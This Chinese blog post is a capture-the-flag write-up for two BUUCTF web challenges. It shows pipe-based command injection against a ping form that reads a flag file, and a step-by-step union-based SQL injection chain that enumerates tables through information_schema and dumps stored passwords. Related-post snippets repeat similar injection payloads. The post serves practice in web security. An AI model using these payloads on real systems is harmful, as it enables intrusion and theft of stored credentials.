BUUCTF WEB exec+lovesql

最新推荐文章于 2023-03-02 19:02:44 发布
最新推荐文章于 2023-03-02 19:02:44 发布
阅读量200 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119785901
版权

攻防世界靶场不知道咋了,又进不去了

那就刷几题BUUCTF吧

exec

这题题目名字给的挺明显的,命令执行

经检测,|,||没有被过滤,且有回显,那就一级级往上找就行了

127.0.0.1|ls ../../../

127.0.0.1|cat ../../../flag

LoveSql

SQL注入,注入点和之前一样的,一个单引号直接回显

那么后面就是payload了

admin 123' order by 4 # 开始报不同的错,可知列数为3

admin 123' union select 1,2,3 # 可知可用的是第二列和第三列

admin 123' union select 1,2,database() #可知当前数据库名称为geek

admin 123' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' # 得到geek数据库下面的两个表名

admin 123' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' # 得到列名

flag被隐藏在了password字段里,那么

admin 123' union select 1,2,group_concat(password) from l0ve1ysq1 #

另一种flag

admin 123' union select 1,2,password from l0ve1ysq1 where password like "%flag%" #

参考视频链接:
https://www.bilibili.com/video/BV1nb4y1S71V
https://www.bilibili.com/video/BV1YP4y1s7vq/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF学习记录Web合集
AugenStern的博客
08-21 338
题目ACTF-WebACTF2020 新生赛 Include1ACTF2020 新生赛 Exec 1ACTF2020 新生赛 BackupFile 1ACTF2020 新生赛 Upload 1 ACTF-Web ACTF2020 新生赛 Include1 知识点:文件包含 打开容器 直接获得flag.php的base64 解码得到flag ACTF2020 新生赛 Exec 1 知识点:命令注入 ping一下127.0.0.1; 无报错回显,说明无WAF,用截断符号配合普通命令,得到flag
azkaban-web+exec+sql
06-09
azkaban-web-server-0.1.0-SNAPSHOT.tar.gz azkaban-exec-server-0.1.0-SNAPSHOT.tar.gz create-all-sql-0.1.0-SNAPSHOT.sql
BUUCTF Web [ACTF2020 新生赛]Exec
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生赛]Exec一、题目简介二、思路分析三、解题步骤1)遍历目录2)查看文件内容四、总结 一、题目简介 进入题目连接后,是一个ping的「功能」,我们输入ip地址或域名后可以使用ping命令「测试」网络的连通性 二、思路分析   &nbs.
BUUCTF_Web_[ACTF2020 新生赛]Exec
阿刁〇的博客
07-31 170
BUUCTF_Web_[ACTF2020 新生赛]Exec 首先打开靶机 可以看出,这是一道有关命令执行的题 根据经验,可以尝试127.0.0.1;cat /flag ;cat /flag 127.0.0.1|cat /flag |cat /flag 127.0.0.1||cat /flag ||cat /flag 127.0.0.1&cat /flag &cat /flag 以上命令均可查询到flag 没有过滤的题,可以利用常见的管道命令符执行 |(按位或),直接执行|后面的语句
buuctf web题[ACTF2020 新生赛]Exec
qq_44740774的博客
09-25 242
buuctf web的[ACTF2020 新生赛]Exec
BUUCTFWebExec(命令执行漏洞)
qq_70434663的博客
03-02 987
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
Notepad++ Exec插件
10-08
Notepad++的 Exec插件 NppExec是介于Notepad++和外部工具/编译器之间的一个中间件。它允许用户在NPP中直接运行这些工具/编译器。 NppExec是一个控制台(Console)窗口,它能展示运行过程的输出结果,并将控制台窗口...
Backup+Exec+安装指南
07-07
Backup+Exec+安装指南 Backup+Exec+安装指南Backup+Exec+安装指南Backup+Exec+安装指南
linux find命令之exec简单概述
09-15
而`-exec`选项则是`find`命令的一个关键功能,它允许在找到匹配的文件后执行指定的命令。 `-exec`参数后面通常跟着一个命令,这个命令可以是任何有效的Linux命令或者脚本。命令的末尾需要加上一个分号`;`来表示命令...
docker-exec-web-console:从浏览器到docker execWeb UI
02-05
docker exec Web控制台此图像最初是由启发的。 容器使用socat将Docker套接字绑定到TCP端口,这样我就可以避免更改Go服务器中的http.Post部分以直接与UNIX套接字进行通信。 您可以通过以下方式启动容器: docker run ...
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec
weixin_42566218的博客
03-09 4103
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec 题目链接:BUUCTF 类型:命令注入 知识点:命令拼接符(||、;、&&…) 解题过程 这道题目比较简单,打开发现是一个ping命令执行页面,使用post接受参数 测试命令拼接符";"发现未进行过滤,拼接ls命令得到回显 target=127.0.0.1;ls 查看index.php源码发现目标未对参数进行任何过滤 target=127.0.0.1;cp index.php 1.txt 网页
buuctf-web-lovesql
qq_51775369的博客
10-24 229
打开靶场,访问题目: 万能密码尝试登录 ,得到了用户名和密码 尝试密码md5解密失败,还是回到注入的思路上 先在username处测试一下有没有注入点:这个题目username和password两个地方都可以作为注入点 ?username=1' order by 1%23&password=ads 没有报错,只是说账号密码错误。直到order by 4的时候,报错了: 4报错,说明3个字段,接下来开始寻找注入点: 联合注入 ?username=1' uni...
BUUCTF WEB LOVESQL
m0_46315342的博客
08-20 1018
BUUCTF WEB LOVESQL 这个题考的是普通的联合注入,但是有一个比较坑的地方就是注释符,所以以后一定要多试试注释符。这个题是这样的,如果你直接写# 或者 --+ 这样的,就得不到想要的界面,这里需要对注释符进行url编码,换成%23这样的 设置用户名为123,密码为111登陆试一下 在用户名处设置’ “试一下 只有设置为单引号的时候有报错信息,然后试一下万能密码 ’ or 1=1# 出现了这样的情况,原因竟然是注释符要换成编码过的%23 然后就是正常的流程了(这个题目usern
BUUCTF:[ACTF2020 新生赛]Exec
末初的CSDN博客
10-20 326
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec 命令执行,使用;或者|进行注入 在根目录发现flag,直接读取
[原题复现]百度杯CTF比赛 十月场 WEB EXEC(PHP弱类型)
笑花大王
03-12 666
简介 原题复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
php exec ctf,[CTF_web]exec/exec1.php
weixin_35524300的博客
03-17 582
CTF_web源码如下 :// Get input$target = $_REQUEST[ 'ip' ];// var_dump($target);$target=trim($target);// var_dump($target);// Set blacklist$substitutions = array('&' => '',';' => '','|' => '',...
BMZCTF WEB easy_exec
Crazy198410的博客
01-25 653
打开页面: 显示:no file 查看源码: 发现新的页面de.php,打开: 可以看到源码 要我们输入两个参数,最后与file拼接,再执行。 知道原理后,开始分析代码: <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; #输入第一个参数 $comm2 = $_GET['comm2']; #输入第二个参数 if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|.
BMZCTF WEB shell_exec
Crazy198410的博客
01-25 393
打开页面发现是个ping的页面: 尝试了几个命令执行的方法,均无返回结果: 查看源代码: 发现了下面的命令: ping -c 2 "$_POST[ip]" 2>&1 后面的2>&1的意思是:标准错误重定向到标准输出。 也就是说我们在网页的输入,当遇错时,结果会被输出到一个地方,而我们没有指定,所以看不到。 知道原理了,那么我们开始构造payload: 1、要程序运行错误; 2、要指定输出位置。 由于页面带过滤,经过多次尝试:发现 #以下被过滤 cat tac less m.
[ACTF2020 新生赛] web题-Exec
BROTHERYY的博客
07-08 471
//复现环境:buuoj.cn ping就完事 直接看看根目录有没有什么惊喜 cat /flag
buuctf exec 1
最新发布
09-26
如果你想执行buuctf exec 1这个命令,可以使用exec函数来实现。具体的操作如下: ```php $command = "buuctf exec 1"; $result = exec($command); echo $result; ?> ``` 以上代码将会执行buuctf exec 1这个命令,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值